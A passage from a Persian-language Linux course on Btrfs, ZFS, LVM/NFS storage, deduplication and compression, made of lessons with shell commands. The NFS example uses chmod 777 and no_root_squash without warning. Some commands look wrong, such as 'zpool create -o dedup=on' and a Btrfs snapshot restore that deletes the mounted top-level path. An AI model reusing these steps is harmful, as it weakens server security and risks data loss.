sudo btrfs filesystem show /mnt/btrfs

۲.۴ حذف یک دیسک از سیستم فایل Btrfs

sudo btrfs device delete /dev/sdY /mnt/btrfs

---

۳. استفاده از Snapshots در Btrfs

۳.۱ ایجاد Snapshot از یک Subvolume

sudo btrfs subvolume snapshot /mnt/btrfs /mnt/btrfs_backup

۳.۲ مشاهده لیست Snapshots

sudo btrfs subvolume list /mnt/btrfs

۳.۳ بازگردانی Snapshot

sudo btrfs subvolume delete /mnt/btrfs
sudo mv /mnt/btrfs_backup /mnt/btrfs

۳.۴ حذف Snapshot

sudo btrfs subvolume delete /mnt/btrfs_backup

---

۴. بررسی و بهینه‌سازی سیستم فایل Btrfs

۴.۱ بررسی سلامت فایل سیستم Btrfs

sudo btrfs check /dev/sdX

۴.۲ اجرای Scrub برای بررسی و اصلاح خطاها

sudo btrfs scrub start /mnt/btrfs
sudo btrfs scrub status /mnt/btrfs

۴.۳ متعادل‌سازی (Balance) فضای ذخیره‌سازی

sudo btrfs balance start /mnt/btrfs

---

۵. فشرده‌سازی داده‌ها در Btrfs

۵.۱ فعال‌سازی فشرده‌سازی هنگام مانت شدن

در فایل /etc/fstab گزینه compress=zstd را اضافه کنید:

/dev/sdX /mnt/btrfs btrfs defaults,compress=zstd 0 0

۵.۲ فشرده‌سازی داده‌های موجود

sudo btrfs filesystem defrag -r -v -czstd /mnt/btrfs

۵.۳ بررسی میزان فشرده‌سازی

sudo btrfs filesystem df /mnt/btrfs

---

جمع‌بندی

در این بخش، نحوه پیکربندی و استفاده از Btrfs را بررسی کردیم. این موارد شامل:

• نصب و ایجاد سیستم فایل Btrfs
• مدیریت حجم‌ها و اضافه کردن دیسک‌ها
• ایجاد و بازیابی Snapshots
• بررسی سلامت فایل سیستم و اجرای Scrub
• فعال‌سازی و بررسی فشرده‌سازی داده‌ها

Btrfs یک گزینه مناسب برای محیط‌های سروری، ذخیره‌سازی داده‌های حجیم و سیستم‌های فایل مدرن است که امکانات مدیریتی قدرتمندی را ارائه می‌دهد.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”ZFS: ویژگی‌ها و کاربردها” subtitle=”توضیحات کامل”]ZFS (Zettabyte File System) یک سیستم فایل پیشرفته و مدیر حجم منطقی (Volume Manager) است که ابتدا توسط Sun Microsystems توسعه داده شد و اکنون در لینوکس، FreeBSD و Solaris استفاده می‌شود. این سیستم فایل ترکیبی از مدیریت ذخیره‌سازی، حفاظت از داده‌ها، فشرده‌سازی، Snapshots، RAID و کشینگ هوشمند را ارائه می‌دهد.

در این بخش، ویژگی‌های کلیدی ZFS و کاربردهای آن را بررسی خواهیم کرد.

---

۱. ویژگی‌های کلیدی ZFS

۱.۱ مدیریت حجم یکپارچه (Pooled Storage)

برخلاف سیستم‌های فایل سنتی که بر اساس پارتیشن‌ها عمل می‌کنند، ZFS از Storage Pools استفاده می‌کند. در ZFS، دیسک‌ها در یک استخر ذخیره‌سازی (Zpool) ترکیب می‌شوند و فضای ذخیره‌سازی به‌صورت پویا تخصیص داده می‌شود.

۱.۲ جلوگیری از خرابی داده‌ها (Data Integrity)

ZFS به‌صورت خودکار CheckSum را برای هر بلاک داده ذخیره می‌کند و هنگام خواندن داده‌ها، صحت آن را بررسی می‌کند. اگر خرابی تشخیص داده شود، ZFS نسخه سالم داده را بازیابی می‌کند.

۱.۳ Snapshots و Clones

ZFS از Snapshots پشتیبانی می‌کند که نسخه‌ای از فایل سیستم را در یک لحظه مشخص ثبت می‌کند. همچنین، می‌توان Clones ایجاد کرد که مانند Snapshot است، اما قابل ویرایش می‌باشد.

۱.۴ فشرده‌سازی داخلی (Compression)

ZFS دارای فشرده‌سازی داخلی برای کاهش حجم داده‌های ذخیره‌شده است که عملکرد سیستم را بهبود می‌بخشد.

۱.۵ پشتیبانی از RAID-Z

ZFS از RAID-Z پشتیبانی می‌کند که مشابه RAID 5 است، اما بدون مشکل Write Hole، که در RAID سنتی باعث از دست رفتن داده‌ها می‌شود.

۱.۶ کشینگ هوشمند (ARC & L2ARC)

ZFS دارای سیستم Adaptive Replacement Cache (ARC) است که داده‌های پرکاربرد را در RAM نگه می‌دارد. همچنین، از L2ARC برای کشینگ روی SSD پشتیبانی می‌کند.

۱.۷ Deduplication (حذف داده‌های تکراری)

ZFS دارای Deduplication است که از ذخیره داده‌های تکراری جلوگیری کرده و فضای مصرفی را کاهش می‌دهد.

---

۲. کاربردهای ZFS

۲.۱ سرورهای ذخیره‌سازی (NAS & SAN)

ZFS برای سرورهای ذخیره‌سازی NAS و SAN گزینه‌ای ایده‌آل است، زیرا دارای RAID-Z، کشینگ پیشرفته و حفاظت از داده‌ها است.

۲.۲ پشتیبان‌گیری و بازیابی داده‌ها

به دلیل پشتیبانی از Snapshots و Replication، ZFS برای سیستم‌های بکاپ‌گیری استفاده می‌شود.

۲.۳ دیتابیس‌ها و سرورهای پردازشی

ZFS با پشتیبانی از Deduplication و کشینگ پیشرفته برای سرورهای دیتابیس و محیط‌های پردازشی مانند Big Data و Machine Learning مناسب است.

۲.۴ سیستم‌های مجازی‌سازی (VM و Docker)

ZFS به‌دلیل Snapshots سریع، Clones و Thin Provisioning، در محیط‌های VMware، KVM و Docker استفاده می‌شود.

---

جمع‌بندی

در این بخش، ویژگی‌ها و کاربردهای ZFS را بررسی کردیم. ZFS یک سیستم فایل پیشرفته و مدیر حجم منطقی است که امکاناتی مانند Snapshots، کشینگ هوشمند، RAID-Z، Deduplication و فشرده‌سازی داخلی را ارائه می‌دهد. این ویژگی‌ها باعث شده است که ZFS گزینه‌ای ایده‌آل برای سرورها، سیستم‌های پشتیبان‌گیری و محیط‌های پردازشی سنگین باشد.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”مدیریت ذخیره‌سازی در سطح بلوک و فایل” subtitle=”توضیحات کامل”]مدیریت ذخیره‌سازی داده‌ها در سیستم‌های کامپیوتری به دو روش اصلی انجام می‌شود: سطح بلوک (Block-Level Storage) و سطح فایل (File-Level Storage). هر یک از این روش‌ها ویژگی‌های خاص خود را دارند و در کاربردهای مختلف مورد استفاده قرار می‌گیرند. در این بخش، این دو روش را به‌صورت کامل بررسی خواهیم کرد.

---

۱. مدیریت ذخیره‌سازی در سطح بلوک (Block-Level Storage)

۱.۱ تعریف و عملکرد

در ذخیره‌سازی سطح بلوک، داده‌ها در قالب بلوک‌های خام بر روی دیسک ذخیره می‌شوند. سیستم‌عامل این بلوک‌ها را مدیریت کرده و آنها را به فایل‌های منطقی تبدیل می‌کند. این نوع ذخیره‌سازی بیشتر در SAN (Storage Area Network) و دیتابیس‌ها استفاده می‌شود.

۱.۲ ویژگی‌های اصلی

• انعطاف‌پذیری بالا: هر بلوک می‌تواند به‌طور مستقل مدیریت و ویرایش شود.
• سرعت بالا: به دلیل دسترسی مستقیم به بلوک‌های داده، سرعت خواندن/نوشتن بالا است.
• پشتیبانی از فرمت‌های مختلف: می‌توان روی آن سیستم فایل‌های مختلفی مانند ext4، XFS یا NTFS پیاده‌سازی کرد.
• پشتیبانی از مجازی‌سازی: برای ذخیره‌سازی ماشین‌های مجازی ایده‌آل است.

۱.۳ کاربردها

• پایگاه‌های داده: به دلیل عملکرد سریع و دسترسی مستقیم به بلوک‌ها.
• سرورهای ایمیل و اپلیکیشن‌های حیاتی: نیازمند تأخیر کم و پردازش سریع داده.
• سیستم‌های مجازی‌سازی: مانند VMware و KVM برای ذخیره‌سازی دیسک‌های ماشین‌های مجازی.

۱.۴ نحوه پیکربندی ذخیره‌سازی در سطح بلوک در لینوکس

برای ایجاد یک LVM Block Storage در لینوکس، مراحل زیر را طی می‌کنیم:

۱.۴.۱ ایجاد یک پارتیشن و تخصیص آن به LVM

fdisk /dev/sdb

سپس گزینه‌های زیر را وارد کنید:

• n → ایجاد پارتیشن جدید
• t → تغییر نوع پارتیشن به 8e (LVM)
• w → ذخیره تغییرات

۱.۴.۲ ایجاد Physical Volume

pvcreate /dev/sdb1

۱.۴.۳ ایجاد Volume Group

vgcreate vg_storage /dev/sdb1

۱.۴.۴ ایجاد Logical Volume

lvcreate -L 10G -n lv_block vg_storage

۱.۴.۵ فرمت و مونت کردن پارتیشن

mkfs.ext4 /dev/vg_storage/lv_block
mkdir /mnt/block_storage
mount /dev/vg_storage/lv_block /mnt/block_storage

مسیر فایل کانفیگ: /etc/fstab
برای اتصال دائمی، خط زیر را اضافه کنید:

/dev/vg_storage/lv_block /mnt/block_storage ext4 defaults 0 2

---

۲. مدیریت ذخیره‌سازی در سطح فایل (File-Level Storage)

۲.۱ تعریف و عملکرد

در ذخیره‌سازی سطح فایل، داده‌ها در قالب فایل و دایرکتوری ذخیره می‌شوند. این روش در NAS (Network Attached Storage) و سیستم‌های اشتراک‌گذاری فایل مانند NFS و SMB استفاده می‌شود.

۲.۲ ویژگی‌های اصلی

• مدیریت ساده: نیازی به پارتیشن‌بندی پیچیده نیست.
• دسترسی چندگانه: چندین کاربر می‌توانند همزمان به فایل‌ها دسترسی داشته باشند.
• پشتیبانی از مجوزها: امکان تنظیم مجوزهای دسترسی بر اساس مالک، گروه و دیگر کاربران.
• نیازمند Overhead بیشتر: به دلیل متادیتای فایل‌ها، ممکن است کارایی کمتری نسبت به ذخیره‌سازی سطح بلوک داشته باشد.

۲.۳ کاربردها

• سرورهای اشتراک‌گذاری فایل: مانند NFS و SMB برای به اشتراک گذاشتن فایل‌ها.
• سرورهای وب و اپلیکیشن: که فایل‌های استاتیک را ذخیره و مدیریت می‌کنند.
• سیستم‌های بکاپ و آرشیو: برای ذخیره‌سازی نسخه‌های بکاپ.

۲.۴ نحوه پیکربندی ذخیره‌سازی در سطح فایل در لینوکس

برای پیکربندی یک NFS Server، مراحل زیر را دنبال کنید:

۲.۴.۱ نصب NFS Server

apt update && apt install nfs-kernel-server -y  # در Debian/Ubuntu
yum install nfs-utils -y  # در CentOS/RHEL

۲.۴.۲ ایجاد دایرکتوری اشتراک‌گذاری

mkdir -p /mnt/file_storage
chmod 777 /mnt/file_storage

۲.۴.۳ تنظیم دسترسی‌ها در فایل /etc/exports

echo "/mnt/file_storage 192.168.1.0/24(rw,sync,no_root_squash)" >> /etc/exports

۲.۴.۴ راه‌اندازی سرویس NFS

exportfs -a
systemctl restart nfs-server

۲.۴.۵ دسترسی کلاینت به سرور NFS

روی کلاینت، دایرکتوری NFS را مونت کنید:

mount -t nfs 192.168.1.100:/mnt/file_storage /mnt/nfs_client

---

جمع‌بندی

ذخیره‌سازی سطح بلوک و ذخیره‌سازی سطح فایل هر دو دارای کاربردهای خاص خود هستند.

• ذخیره‌سازی سطح بلوک برای پایگاه‌های داده، سرورهای مجازی و اپلیکیشن‌های با کارایی بالا ایده‌آل است.
• ذخیره‌سازی سطح فایل برای اشتراک‌گذاری داده‌ها در شبکه، سرورهای وب و آرشیو داده‌ها استفاده می‌شود.

هر دو روش را می‌توان با استفاده از LVM، NFS و سایر ابزارهای مدیریتی در لینوکس پیاده‌سازی کرد.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”قابلیت‌های Deduplication و Compression در مدیریت ذخیره‌سازی” subtitle=”توضیحات کامل”]در سیستم‌های ذخیره‌سازی مدرن، بهینه‌سازی فضای ذخیره‌سازی یکی از مهم‌ترین چالش‌ها محسوب می‌شود. دو تکنیک مهم برای بهینه‌سازی Deduplication (حذف داده‌های تکراری) و Compression (فشرده‌سازی داده‌ها) هستند. این دو قابلیت به کاهش استفاده از فضای ذخیره‌سازی، افزایش کارایی و کاهش هزینه‌های زیرساخت کمک می‌کنند.

---

۱. Deduplication: حذف داده‌های تکراری

۱.۱ تعریف Deduplication

Deduplication فرآیندی است که داده‌های تکراری را حذف کرده و تنها یک نسخه از داده ذخیره می‌شود. این تکنیک باعث کاهش میزان فضای مورد نیاز برای ذخیره‌سازی می‌شود، خصوصاً در محیط‌هایی که داده‌های مشابه بارها ذخیره می‌شوند، مانند:

• بکاپ‌های تکراری
• ایمیل‌های دارای پیوست‌های مشابه
• ماشین‌های مجازی که سیستم‌عامل یکسان دارند

۱.۲ انواع Deduplication

1. Deduplication در سطح فایل (File-Level Deduplication)
   • بررسی می‌کند که آیا فایل‌های ذخیره‌شده قبلاً وجود دارند یا نه.
   • اگر فایل مشابهی یافت شود، به‌جای ایجاد یک کپی جدید، یک لینک به فایل اصلی ایجاد می‌شود.
2. Deduplication در سطح بلوک (Block-Level Deduplication)
   • داده‌ها را در سطح بلوک‌های کوچک‌تر بررسی می‌کند.
   • بلوک‌های یکسان حذف شده و فقط یک نسخه ذخیره می‌شود.
3. Deduplication در سطح بایت (Byte-Level Deduplication)
   • دقیق‌ترین روش که داده‌ها را در سطح بایت بررسی می‌کند.

۱.۳ مزایای Deduplication

• کاهش میزان فضای ذخیره‌سازی مصرف‌شده
• کاهش هزینه‌های ذخیره‌سازی و نیاز به هاردهای بیشتر
• افزایش کارایی در عملیات بکاپ و بازیابی

۱.۴ پیاده‌سازی Deduplication در ZFS

ZFS به‌صورت داخلی از Deduplication در سطح بلوک پشتیبانی می‌کند. برای فعال‌سازی آن:

۱.۴.۱ ایجاد یک ZFS Pool و فعال‌سازی Deduplication

zpool create -f zpool1 /dev/sdb
zfs set dedup=on zpool1

۱.۴.۲ بررسی وضعیت Deduplication

zpool list
zfs get dedup zpool1

۱.۴.۳ غیرفعال کردن Deduplication

zfs set dedup=off zpool1

مسیر فایل تنظیمات: /etc/zfs/zpool.cache

---

۲. Compression: فشرده‌سازی داده‌ها

۲.۱ تعریف Compression

فشرده‌سازی (Compression) فرآیندی است که داده‌ها را به فرمتی کوچک‌تر تبدیل کرده تا فضای کمتری اشغال کنند. این تکنیک باعث بهبود عملکرد ذخیره‌سازی و کاهش فضای اشغال‌شده توسط داده‌ها می‌شود.

۲.۲ انواع فشرده‌سازی

1. فشرده‌سازی آنلاین (Inline Compression)
   • داده‌ها قبل از ذخیره‌شدن، به‌صورت خودکار فشرده می‌شوند.
   • معمولاً در فایل‌سیستم‌هایی مانند Btrfs، ZFS و NTFS پیاده‌سازی می‌شود.
2. فشرده‌سازی آفلاین (Post-Processing Compression)
   • داده‌ها ابتدا ذخیره‌شده و سپس در یک فرآیند جداگانه فشرده می‌شوند.

۲.۳ مزایای Compression

• کاهش فضای مورد نیاز برای ذخیره‌سازی
• افزایش سرعت انتقال داده در شبکه
• بهبود کارایی در ذخیره‌سازی داده‌های تکراری

۲.۴ پیاده‌سازی Compression در ZFS

ZFS قابلیت فشرده‌سازی داخلی دارد که می‌توان آن را روی ZFS Pool فعال کرد.

۲.۴.۱ فعال‌سازی فشرده‌سازی در ZFS

zfs set compression=lz4 zpool1

۲.۴.۲ بررسی وضعیت فشرده‌سازی

zfs get compression zpool1

۲.۴.۳ غیرفعال کردن فشرده‌سازی

zfs set compression=off zpool1

---

۳. ترکیب Deduplication و Compression

در بسیاری از سیستم‌ها، Deduplication و Compression به‌صورت ترکیبی استفاده می‌شوند. برای مثال:

• Deduplication ابتدا داده‌های تکراری را حذف می‌کند.
• Compression داده‌های باقی‌مانده را فشرده می‌کند.

این ترکیب باعث حداکثر بهینه‌سازی در مصرف فضای ذخیره‌سازی می‌شود.

۳.۱ فعال‌سازی همزمان Deduplication و Compression در ZFS

zfs set dedup=on compression=lz4 zpool1

۳.۲ بررسی وضعیت

zfs get dedup,compression zpool1

---

جمع‌بندی

• Deduplication داده‌های تکراری را حذف کرده و باعث کاهش مصرف فضای ذخیره‌سازی می‌شود.
• Compression داده‌ها را فشرده کرده و باعث کاهش حجم فایل‌ها و افزایش سرعت انتقال می‌شود.
• ترکیب این دو روش در فایل‌سیستم‌هایی مانند ZFS می‌تواند بهینه‌ترین استفاده از فضای ذخیره‌سازی را ارائه دهد.
• ZFS و Btrfs دو سیستم فایل محبوب هستند که از این قابلیت‌ها پشتیبانی می‌کنند و می‌توان آنها را از طریق تنظیمات CLI فعال کرد.

[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”نحوه نصب، پیکربندی و استفاده از ZFS” subtitle=”توضیحات کامل”]ZFS یک سیستم فایل و مدیریت حجم منطقی (Logical Volume Manager) قدرتمند است که قابلیت‌هایی مانند Snapshots، Deduplication، Compression، RAID-Z و بسیاری دیگر را ارائه می‌دهد. در این بخش، نحوه نصب، پیکربندی و استفاده از ZFS را به همراه مثال‌های عملی بررسی می‌کنیم.

---

۱. نصب ZFS

۱.۱ نصب ZFS در توزیع‌های مختلف لینوکس

۱.۱.۱ نصب در Ubuntu/Debian

sudo apt update
sudo apt install -y zfsutils-linux

۱.۱.۲ نصب در CentOS/RHEL

sudo yum install -y epel-release
sudo yum install -y zfs

۱.۱.۳ نصب در Arch Linux

sudo pacman -S zfs-utils

۱.۲ بررسی نصب ZFS

modinfo zfs
zfs version

---

۲. ایجاد و مدیریت ZFS Pool

۲.۱ ایجاد یک ZFS Pool با یک دیسک

sudo zpool create zpool1 /dev/sdb

مسیر فایل تنظیمات: /etc/zfs/zpool.cache

۲.۲ بررسی وضعیت Pool

zpool status
zpool list

۲.۳ حذف یک ZFS Pool

sudo zpool destroy zpool1

۲.۴ ایجاد ZFS Pool با RAID-Z

• RAID-Z1 (مشابه RAID-5):

sudo zpool create zpool1 raidz /dev/sdb /dev/sdc /dev/sdd

• RAID-Z2 (مشابه RAID-6):

sudo zpool create zpool1 raidz2 /dev/sdb /dev/sdc /dev/sdd /dev/sde

---

۳. مدیریت فایل‌سیستم‌های ZFS

۳.۱ ایجاد یک فایل‌سیستم در ZFS

sudo zfs create zpool1/data

۳.۲ بررسی فایل‌سیستم‌های موجود

zfs list

۳.۳ حذف فایل‌سیستم ZFS

sudo zfs destroy zpool1/data

۳.۴ تنظیمات Mount و Unmount در ZFS

sudo zfs set mountpoint=/mnt/data zpool1/data
sudo zfs mount zpool1/data
sudo zfs unmount zpool1/data

۳.۵ تغییر اندازه فایل‌سیستم

sudo zfs set quota=10G zpool1/data

---

۴. Snapshots و Rollback در ZFS

۴.۱ ایجاد یک Snapshot

sudo zfs snapshot zpool1/data@snap1

۴.۲ مشاهده Snapshots موجود

zfs list -t snapshot

۴.۳ بازگردانی Snapshot

sudo zfs rollback zpool1/data@snap1

۴.۴ حذف Snapshot

sudo zfs destroy zpool1/data@snap1

---

۵. فشرده‌سازی (Compression) و حذف داده‌های تکراری (Deduplication)

۵.۱ فعال‌سازی فشرده‌سازی

sudo zfs set compression=lz4 zpool1

۵.۲ بررسی وضعیت فشرده‌سازی

zfs get compression zpool1

۵.۳ فعال‌سازی Deduplication

sudo zfs set dedup=on zpool1

۵.۴ بررسی وضعیت Deduplication

zfs get dedup zpool1

---

جمع‌بندی

• ZFS یک سیستم فایل مدرن است که قابلیت مدیریت حجم، Snapshots، RAID-Z، Deduplication و Compression را ارائه می‌دهد.
• ZFS Pool پایه اصلی ذخیره‌سازی در این سیستم است که از طریق RAID-Z1، RAID-Z2 و تک‌دیسک قابل‌پیاده‌سازی است.
• فایل‌سیستم‌های ZFS می‌توانند به‌صورت داینامیک مدیریت شوند، بدون نیاز به فرمت مجدد.
• Snapshots و Rollback امکان بازگردانی سریع داده‌ها را فراهم می‌کنند.
• Compression و Deduplication کمک می‌کنند تا فضای ذخیره‌سازی بهینه‌تر مصرف شود.

[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”تفاوت‌ها و مزایای استفاده از Btrfs و ZFS نسبت به سیستم فایل‌های سنتی” subtitle=”توضیحات کامل”]سیستم فایل‌های مدرن مانند Btrfs و ZFS در مقایسه با سیستم فایل‌های سنتی مانند ext4، XFS و NTFS قابلیت‌های پیشرفته‌ای ارائه می‌دهند که مدیریت داده‌ها را بهینه‌تر و امن‌تر می‌کند. در این بخش، تفاوت‌ها و مزایای این دو سیستم فایل را نسبت به سیستم‌های فایل سنتی بررسی خواهیم کرد.

---

۱. مقایسه کلی Btrfs و ZFS با سیستم فایل‌های سنتی

۱.۱ ساختار ذخیره‌سازی

• ZFS و Btrfs دارای مدیریت یکپارچه حجم و سیستم فایل هستند، در حالی که در سیستم فایل‌های سنتی مانند ext4 و XFS حجم مدیریت جداگانه‌ای نیاز است (مثلاً LVM).
• Btrfs و ZFS از Copy-on-Write (CoW) استفاده می‌کنند که باعث افزایش امنیت داده‌ها می‌شود، اما ext4 و XFS همچنان از مدل‌های سنتی نوشتن داده بهره می‌برند.

۱.۲ قابلیت Snapshots و Rollback

• Btrfs و ZFS به‌طور داخلی از Snapshots پشتیبانی می‌کنند و امکان Rollback به نسخه‌های قبلی داده‌ها را فراهم می‌کنند.
• در مقابل، سیستم فایل‌های سنتی مانند ext4 و XFS این ویژگی را ندارند و نیاز به ابزارهای اضافی مانند LVM snapshots دارند.

۱.۳ تحمل خطا و RAID داخلی

• ZFS و Btrfs دارای RAID داخلی هستند که نیازی به RAID سخت‌افزاری یا نرم‌افزاری جداگانه ندارند.
• سیستم فایل‌های سنتی برای پیاده‌سازی RAID نیاز به ابزارهای mdadm یا RAID سخت‌افزاری دارند.

۱.۴ حذف داده‌های تکراری (Deduplication)

• ZFS از Deduplication پشتیبانی می‌کند که باعث کاهش فضای مصرفی برای داده‌های مشابه می‌شود.
• Btrfs به‌طور رسمی Deduplication را پشتیبانی نمی‌کند و نیاز به ابزارهای جانبی مانند duperemove دارد.
• سیستم‌های فایل سنتی مانند ext4 و XFS این قابلیت را به‌صورت پیش‌فرض ارائه نمی‌دهند.

۱.۵ فشرده‌سازی (Compression)

• ZFS و Btrfs دارای قابلیت فشرده‌سازی داخلی هستند که به کاهش فضای ذخیره‌سازی و افزایش عملکرد کمک می‌کند.
• ext4 و XFS از فشرده‌سازی داخلی پشتیبانی نمی‌کنند و نیاز به ابزارهای خارجی مانند zlib یا LZ4 دارند.

---

۲. مقایسه قابلیت‌های Btrfs و ZFS

قابلیت	Btrfs	ZFS	ext4	XFS
مدیریت یکپارچه حجم و فایل‌سیستم	✅ بله	✅ بله	❌ خیر	❌ خیر
Copy-on-Write (CoW)	✅ بله	✅ بله	❌ خیر	❌ خیر
Snapshots	✅ بله	✅ بله	❌ خیر	❌ خیر
RAID داخلی	✅ بله	✅ بله	❌ خیر	❌ خیر
Deduplication	⭕ محدود (نیاز به ابزار خارجی)	✅ بله	❌ خیر	❌ خیر
Compression	✅ بله	✅ بله	❌ خیر	❌ خیر
Self-healing (اصلاح خودکار داده‌ها)	✅ بله	✅ بله	❌ خیر	❌ خیر
پشتیبانی از رمزنگاری داخلی	❌ خیر (نیاز به LUKS)	✅ بله	❌ خیر	❌ خیر

---

۳. بررسی مزایای ZFS و Btrfs نسبت به سیستم فایل‌های سنتی

۳.۱ امنیت داده‌ها و مقاومت در برابر خرابی

• ZFS و Btrfs از Checksum و Self-healing برای شناسایی و اصلاح خودکار داده‌های خراب شده استفاده می‌کنند.
• ext4 و XFS فاقد این قابلیت هستند و داده‌های خراب به‌سادگی ممکن است از بین بروند.

۳.۲ کاهش فضای ذخیره‌سازی با Compression و Deduplication

• ZFS با استفاده از Deduplication و Compression می‌تواند حجم قابل‌توجهی از داده‌های تکراری را حذف کند.
• Btrfs از Compression پشتیبانی می‌کند اما Deduplication را فقط با ابزارهای جانبی ارائه می‌دهد.
• سیستم فایل‌های سنتی هیچ‌یک از این قابلیت‌ها را ندارند.

۳.۳ مدیریت بهتر حجم‌های ذخیره‌سازی

• Btrfs و ZFS از Thin Provisioning به‌صورت داخلی پشتیبانی می‌کنند.
• سیستم‌های سنتی مانند ext4 و XFS برای این قابلیت نیاز به ابزارهای خارجی مانند LVM دارند.

۳.۴ عملکرد بهینه در مدیریت داده‌های بزرگ

• ZFS برای سیستم‌های بزرگ و سرورهای ذخیره‌سازی مناسب‌تر است، درحالی‌که Btrfs برای سیستم‌های رومیزی و NAS کاربردی‌تر است.
• ext4 و XFS در بارهای کاری سنگین عملکرد خوبی دارند اما فاقد قابلیت‌های پیشرفته مدیریت داده‌ها هستند.

---

۴. جمع‌بندی

• ZFS و Btrfs در مقایسه با سیستم فایل‌های سنتی مانند ext4 و XFS قابلیت‌های پیشرفته‌ای از جمله Snapshots، RAID داخلی، Compression و Self-healing را ارائه می‌دهند.
• ZFS برای محیط‌های سروری و ذخیره‌سازی بزرگ مناسب است، در حالی که Btrfs برای سیستم‌های دسکتاپ و NAS کارایی بهتری دارد.
• سیستم فایل‌های سنتی همچنان در برخی محیط‌ها مناسب هستند اما از نظر امنیت داده، کارایی و انعطاف‌پذیری قابل رقابت با ZFS و Btrfs نیستند.

[/cdb_course_lesson][cdb_course_lesson title=”فصل 3. Deduplication، Compression و Checksum”][/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”مفهوم Deduplication در ذخیره‌سازی” subtitle=”توضیحات کامل”]Deduplication یکی از تکنیک‌های بهینه‌سازی فضای ذخیره‌سازی است که با حذف داده‌های تکراری و نگهداری تنها یک نمونه از داده‌های مشابه، میزان فضای مصرف‌شده را کاهش می‌دهد. این فرآیند به‌ویژه در سیستم‌های پشتیبان‌گیری، ذخیره‌سازی ابری، پایگاه‌های داده و سرورهای مجازی‌سازی کاربرد دارد.

---

۱. روش‌های Deduplication

۱.۱ Deduplication در سطح فایل (File-level Deduplication)

در این روش، اگر دو یا چند فایل دقیقاً یکسان باشند، سیستم تنها یک نسخه از فایل را نگه می‌دارد و به‌جای ذخیره مجدد فایل‌های مشابه، اشاره‌گرهایی (hard links) به نسخه اصلی ایجاد می‌کند.

۱.۲ Deduplication در سطح بلاک (Block-level Deduplication)

در این روش، داده‌ها به بلاک‌هایی با اندازه ثابت یا متغیر تقسیم شده و هش هر بلاک محاسبه می‌شود. در صورت یافتن بلاک‌های مشابه، تنها یک نسخه از آن نگه داشته شده و سایر بلاک‌ها به آن اشاره می‌کنند.

۱.۳ Deduplication در سطح بایت (Byte-level Deduplication)

این روش دقیق‌ترین اما پرهزینه‌ترین روش است که تک‌تک بایت‌های داده را بررسی کرده و نسخه‌های تکراری را حذف می‌کند. این روش عمدتاً در سیستم‌های فشرده‌سازی و کاهش حجم داده‌های حجیم استفاده می‌شود.

---

۲. مزایای استفاده از Deduplication

• کاهش مصرف فضای ذخیره‌سازی: با حذف داده‌های تکراری، میزان فضای ذخیره‌سازی موردنیاز کاهش می‌یابد.
• بهبود کارایی پشتیبان‌گیری و بازیابی: حجم کمتر داده‌ها منجر به سرعت بالاتر در فرآیند Backup و Restore می‌شود.
• افزایش کارایی شبکه: داده‌های کمتر برای انتقال به سرورهای پشتیبان یا فضای ابری ارسال شده و مصرف پهنای باند کاهش می‌یابد.
• مدیریت بهتر داده‌ها: فضای ذخیره‌سازی کارآمدتر مدیریت شده و نیاز به دیسک‌های اضافی کمتر می‌شود.

---

۳. پیاده‌سازی Deduplication در ZFS

۳.۱ فعال‌سازی Deduplication هنگام ایجاد Pool

برای ایجاد یک استخر ذخیره‌سازی در ZFS با Deduplication فعال، از دستور زیر استفاده کنید:

zpool create -o dedup=on mypool mirror /dev/sdb /dev/sdc

در این دستور، mypool یک ZFS pool ایجاد کرده و Deduplication را روی آن فعال می‌کند.

۳.۲ فعال‌سازی Deduplication برای یک Dataset خاص

اگر بخواهید Deduplication را روی یک Dataset خاص فعال کنید، از دستور زیر استفاده کنید:

zfs set dedup=on mypool/dataset1

این دستور Deduplication را روی mypool/dataset1 فعال می‌کند.

۳.۳ بررسی وضعیت Deduplication در ZFS

برای مشاهده وضعیت Deduplication روی ZFS pool می‌توانید از این دستور استفاده کنید:

zpool list -o name,dedupratio

خروجی این دستور نسبت Deduplication را نشان می‌دهد، مثلاً 1.50x یعنی ۵۰٪ صرفه‌جویی در فضا.

۳.۴ غیرفعال‌سازی Deduplication در ZFS

اگر بخواهید Deduplication را غیرفعال کنید، از دستور زیر استفاده کنید:

zfs set dedup=off mypool/dataset1

این دستور Deduplication را روی Dataset مشخص‌شده غیرفعال می‌کند.

---

۴. پیاده‌سازی Deduplication در Btrfs

Btrfs به‌طور پیش‌فرض از Deduplication درون‌ساخت پشتیبانی نمی‌کند، اما می‌توان از ابزارهای جانبی مانند duperemove و bees برای این کار استفاده کرد.

۴.۱ نصب ابزار duperemove در Debian/Ubuntu

apt install duperemove -y

۴.۲ اجرای Deduplication روی یک فایل‌سیستم Btrfs

duperemove -dr /mnt/btrfs_volume

این دستور Deduplication را روی مسیر /mnt/btrfs_volume اجرا می‌کند.

۴.۳ بررسی میزان Deduplication در Btrfs

btrfs filesystem df /mnt/btrfs_volume

این دستور فضای ذخیره‌شده توسط Deduplication را نشان می‌دهد.

---

۵. جمع‌بندی

• Deduplication یکی از روش‌های بهینه‌سازی ذخیره‌سازی است که داده‌های تکراری را حذف می‌کند.
• ZFS دارای Deduplication داخلی است و به‌راحتی می‌توان آن را فعال یا غیرفعال کرد.
• Btrfs به‌صورت پیش‌فرض از Deduplication پشتیبانی نمی‌کند و نیاز به ابزارهایی مانند duperemove دارد.
• این روش باعث کاهش فضای اشغال‌شده، بهبود سرعت پشتیبان‌گیری و کاهش مصرف پهنای باند شبکه می‌شود.

[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”تنظیمات Compression برای کاهش فضای ذخیره‌سازی” subtitle=”توضیحات کامل”]Compression یا فشرده‌سازی یکی از روش‌های مؤثر برای کاهش میزان فضای ذخیره‌سازی مصرفی در سیستم‌های فایل مدرن مانند ZFS، Btrfs و LVM است. این روش با کاهش حجم داده‌ها قبل از ذخیره‌سازی، میزان مصرف دیسک را بهینه کرده و در برخی موارد می‌تواند عملکرد خواندن و نوشتن را نیز بهبود دهد.

---

